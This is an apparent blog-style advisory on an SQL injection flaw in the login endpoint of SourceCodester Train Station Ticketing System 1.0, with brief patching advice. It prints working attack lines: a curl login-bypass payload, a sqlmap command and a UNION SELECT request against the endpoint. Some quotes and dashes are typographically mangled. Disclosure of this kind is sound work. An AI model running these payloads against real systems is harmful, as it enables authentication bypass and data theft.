Listen to this Post
The vulnerability in SourceCodester Train Station Ticketing System 1.0 exists within the `/ajax.php?action=login` endpoint. The system fails to properly sanitize user-supplied input in the `Username` parameter before incorporating it into an SQL query. An attacker can send a specially crafted HTTP POST request containing SQL manipulation commands, such as a single quote (‘) or SQL-specific syntax like ' OR '1'='1, within the Username field. This unsanitized input is then concatenated directly into the SQL statement executed on the backend database. Because the query is constructed dynamically without using prepared statements, the attacker’s input alters the query’s logic, potentially allowing them to bypass authentication, extract sensitive data from the database, or modify database contents, all without requiring valid credentials.
Platform: SourceCodester Train Station Ticketing System
Version: 1.0
Vulnerability: SQL Injection
Severity: Medium
date: 11/18/2025
Prediction: Patch expected by 12/20/2025
What Undercode Say:
`curl -X POST -d “Username=admin’ OR ‘1’=’1′–&Password=any” http://target/ajax.php?action=login`
`sqlmap -u “http://target/ajax.php” –data=”action=login&Username=test&Password=test” -p Username –batch`
`POST /ajax.php?action=login HTTP/1.1 Host: target Content-Type: application/x-www-form-urlencoded Username=test’ UNION SELECT 1,2,version()–&Password=pass`
How Exploit:
Craft malicious POST request to `/ajax.php?action=login` with SQL payloads in the `Username` parameter to bypass login or dump database information.
Protection from this CVE:
Use prepared statements.
Implement input validation.
Apply vendor patch.
Impact:
Authentication Bypass.
Data Theft.
Unauthorized Access.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
